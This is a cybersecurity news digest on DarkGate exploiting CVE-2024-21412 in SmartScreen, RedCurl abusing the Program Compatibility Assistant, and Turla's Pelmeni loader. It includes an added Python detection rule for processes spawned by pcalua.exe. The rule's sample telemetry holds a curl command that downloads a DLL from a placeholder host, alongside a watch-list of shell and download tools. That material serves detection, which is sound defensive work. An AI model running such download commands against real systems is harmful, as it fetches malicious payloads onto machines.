
Windows Defender SmartScreen Vulnerability Exploited by DarkGate Malware

The DarkGate malware operation exploited a vulnerability in Windows Defender SmartScreen, allowing attackers to bypass security warnings and execute malicious activities, which has since been patched by Microsoft.

At a glance

  • DarkGate malware exploiting a patched Windows Defender SmartScreen vulnerability.
  • Microsoft released a patch in mid-February to address the CVE-2024-21412 vulnerability.
  • DarkGate operators using the vulnerability for malicious activities, filling the gap left by the QBot disruption.
  • RedCurl cybercrime group utilizing the Program Compatibility Assistant for malicious commands.
  • Recommendation to apply Microsoft’s February 2024 Patch Tuesday update to mitigate DarkGate risks.

The details

A recent malware operation known as DarkGate has been exploiting a now-patched vulnerability in Windows Defender SmartScreen.

SmartScreen is a security feature in Windows that warns users about suspicious files.

The vulnerability, identified as CVE-2024-21412, allowed files to bypass security warnings; attackers exploited the flaw by crafting Windows Internet shortcut files.

Microsoft Patch

Microsoft addressed this issue in a patch released in mid-February.

The Water Hydra hacking group had previously taken advantage of this vulnerability as a zero-day exploit.

Now, DarkGate operators are using the same vulnerability to carry out their malicious activities.

DarkGate and Pikabot

DarkGate, along with Pikabot, has been filling the gap left by the disruption of the QBot malware.

The attack typically begins with a malicious email containing a PDF attachment with links that use open redirects from Google DDM services to bypass security checks.

Malicious MSI files are disguised as legitimate software, with the MSI installer executing the DarkGate malware payload.

This malware is capable of data theft, fetching additional payloads, key logging, and providing attackers with remote access.

The current campaign is using DarkGate version 6.1.7, which includes new features and updates to enhance operational tactics and evasion techniques.

To mitigate the risks associated with this DarkGate campaign, it is recommended to apply Microsoft’s February 2024 Patch Tuesday update.

Trend Micro has also published a list of indicators of compromise specific to this DarkGate campaign.

RedCurl Cybercrime Group

On a separate note, the Russian-speaking cybercrime group RedCurl has been utilizing the Program Compatibility Assistant (PCA) to carry out malicious commands.

The PCA Service (pcalua.exe) is a Windows service designed to address compatibility issues with older programs.

RedCurl, also known as Earth Kapre and Red Wolf, has been active since at least 2018 and has been involved in corporate cyber espionage attacks against entities in various countries.

In July 2023, F.A.C.C.T. disclosed that a major Russian bank and an Australian company were targeted by RedCurl.

The attack involves phishing emails with malicious attachments, cmd.exe, curl, and a loader (ms.dll or ps.dll). A malicious DLL file uses PCA to spawn a downloader process that establishes a connection with a remote server.
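The step above, a loader using the Program Compatibility Assistant launcher (pcalua.exe) to start a downloader, leaves a distinctive parent/child process relationship. The following is an added detection example written for this page; it is not code from the article, from BleepingComputer, The Hacker News or Trend Micro, and it assumes Sysmon-style process-creation telemetry (field names ParentImage, Image, CommandLine, Computer and UtcTime are assumptions), with constructed sample events rather than real data.

```python
"""
Detection example: flag process-creation events where pcalua.exe is the
parent, as in the RedCurl chain described above. Added example for this
page, not the article's code. Sysmon-style field names are assumed.
"""
import json
import ntpath
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Children matching the downloader/shell stage in the reported chain
# (cmd.exe, curl); powershell.exe is added as an assumption for completeness.
HIGH_CONFIDENCE_CHILDREN = {"cmd.exe", "curl.exe", "powershell.exe"}


@dataclass
class Finding:
    host: str
    time: str
    child: str
    command_line: str
    severity: str


def evaluate_event(event: dict) -> Optional[Finding]:
    """Return a Finding when the event's parent process is pcalua.exe."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if parent != "pcalua.exe":
        return None
    child = ntpath.basename(event.get("Image", "")).lower()
    # A shell or HTTP client launched through PCA matches the reported chain;
    # any other child is still unusual enough to review at lower confidence,
    # since PCA normally only relaunches an old installer the user chose.
    severity = "high" if child in HIGH_CONFIDENCE_CHILDREN else "medium"
    return Finding(
        host=event.get("Computer", "?"),
        time=event.get("UtcTime", "?"),
        child=child,
        command_line=event.get("CommandLine", ""),
        severity=severity,
    )


def scan_jsonl(lines: Iterable[str]) -> List[Finding]:
    """Run the rule over newline-delimited JSON events, skipping bad lines."""
    findings: List[Finding] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed telemetry must not abort the scan
        finding = evaluate_event(event)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample telemetry (not real data); hostnames and URL are placeholders.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"UtcTime": "2024-03-14 09:12:01", "Computer": "WS01",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
    {"UtcTime": "2024-03-14 09:13:40", "Computer": "WS01",
     "ParentImage": r"C:\Windows\System32\pcalua.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -o C:\Users\Public\ps.dll http://placeholder.invalid/ps.dll"},
    {"UtcTime": "2024-03-14 09:13:41", "Computer": "WS01",
     "ParentImage": r"C:\Windows\System32\pcalua.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c hostname"},
    {"UtcTime": "2024-03-14 10:02:15", "Computer": "WS02",
     "ParentImage": r"C:\Windows\System32\pcalua.exe",
     "Image": r"C:\Users\bob\Downloads\legacy-setup.exe",
     "CommandLine": "legacy-setup.exe"},
])


if __name__ == "__main__":
    for f in scan_jsonl(SAMPLE_LOG.splitlines()):
        print(f"{f.severity.upper():6} {f.host} {f.time} "
              f"pcalua.exe -> {f.child}: {f.command_line}")
```

Running the block prints two high-confidence findings (curl.exe and cmd.exe under pcalua.exe) and one medium one (a legacy installer, the kind of child PCA launches legitimately). The medium tier exists because PCA does start programs on a user's behalf, so the rule is a triage signal to be paired with the network destination or file write that follows, not a standalone block.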

The attack also utilizes the Impacket open-source software for unauthorized command execution.

Connections to Earth Kapre are identified through overlaps in the command-and-control infrastructure.

To further evade detection within targeted networks, Earth Kapre employs sophisticated tactics.

The Russian nation-state group Turla has recently started using a new wrapper DLL called Pelmeni to deploy the Kazuar backdoor.

Pelmeni disguises itself as libraries related to various software to launch Kazuar through DLL side-loading.

Article X-ray


Facts attribution

This section links each of the article’s facts back to its original source.

If you suspect false information in the article, you can use this section to investigate where it came from.

bleepingcomputer.com
– DarkGate malware operation exploits a now-fixed Windows Defender SmartScreen vulnerability
– SmartScreen is a Windows security feature that displays a warning for unrecognized or suspicious files
– Flaw tracked as CVE-2024-21412 allows files to bypass security warnings
– Attackers create Windows Internet shortcut files to exploit the flaw
– Microsoft fixed the flaw in mid-February
– Water Hydra hacking group previously exploited the flaw as a zero-day
– DarkGate operators are now exploiting the same flaw
– DarkGate malware, along with Pikabot, has filled the void left by QBot’s disruption
– Attack begins with a malicious email containing a PDF attachment with links
– Links use open redirects from Google DDM services to bypass security checks
– Malicious MSI files masquerade as legitimate software
– MSI installer executes DarkGate malware payload
– Malware can steal data, fetch additional payloads, perform key logging, and give attackers remote access
– Campaign employs DarkGate version 6.1.7 with new features and updates
– Configuration parameters in DarkGate 6 allow for operational tactics and evasion techniques
– Mitigation includes applying Microsoft’s February 2024 Patch Tuesday update
– Trend Micro has published a list of indicators of compromise for this DarkGate campaign
thehackernews.com
– RedCurl is a Russian-speaking cybercrime group using the Program Compatibility Assistant (PCA) to execute malicious commands
– The Program Compatibility Assistant Service (pcalua.exe) is a Windows service designed to address compatibility issues with older programs
– RedCurl, also known as Earth Kapre and Red Wolf, has been active since at least 2018
– RedCurl has orchestrated corporate cyber espionage attacks against entities in various countries
– In July 2023, F.A.C.C.T. revealed that a major Russian bank and an Australian company were targeted by RedCurl
– The attack chain involves phishing emails with malicious attachments, cmd.exe, curl, and a loader (ms.dll or ps.dll)
– The malicious DLL file uses PCA to spawn a downloader process to establish a connection with a remote server
– The attack also uses the Impacket open-source software for unauthorized command execution
– Connections to Earth Kapre are identified through overlaps in the command-and-control infrastructure
– Earth Kapre employs sophisticated tactics to evade detection within targeted networks
– The Russian nation-state group Turla has begun using a new wrapper DLL called Pelmeni to deploy the Kazuar backdoor
– Pelmeni masquerades as libraries related to various software to launch Kazuar through DLL side-loading
